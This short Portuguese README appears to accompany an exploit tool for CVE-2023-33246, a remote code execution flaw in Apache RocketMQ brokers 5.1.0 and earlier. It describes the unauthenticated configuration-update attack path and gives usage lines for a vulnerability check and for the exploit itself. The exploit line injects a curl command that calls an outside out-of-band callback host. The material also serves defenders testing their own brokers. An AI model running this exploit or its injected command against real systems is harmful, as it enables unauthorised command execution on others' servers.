
Exploit para CVE-2023-33246 direcionado a brokers Apache RocketMQ. Executa comandos arbitrários via atualização de configuração não autenticada ou mensagens de protocolo forjadas em versões vulneráveis 5.1.0 e anteriores.
CVE-2023-33246 Exploit de Execução Remota de Código do RocketMQ
As versões do RocketMQ 5.1.0 e anteriores são vulneráveis a Injeção Arbitrária de Código. O componente Broker do RocketMQ é exposto na extranet e não possui verificação de permissão. Um atacante pode explorar essa vulnerabilidade usando a função de atualização de configuração para executar comandos como os usuários do sistema sob os quais o RocketMQ está sendo executado. Além disso, um atacante pode alcançar o mesmo efeito forjando o conteúdo do protocolo RocketMQ.
verificação
./RocketMQRceCheck -host 127.0.0.1 -port 9876
exploração
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test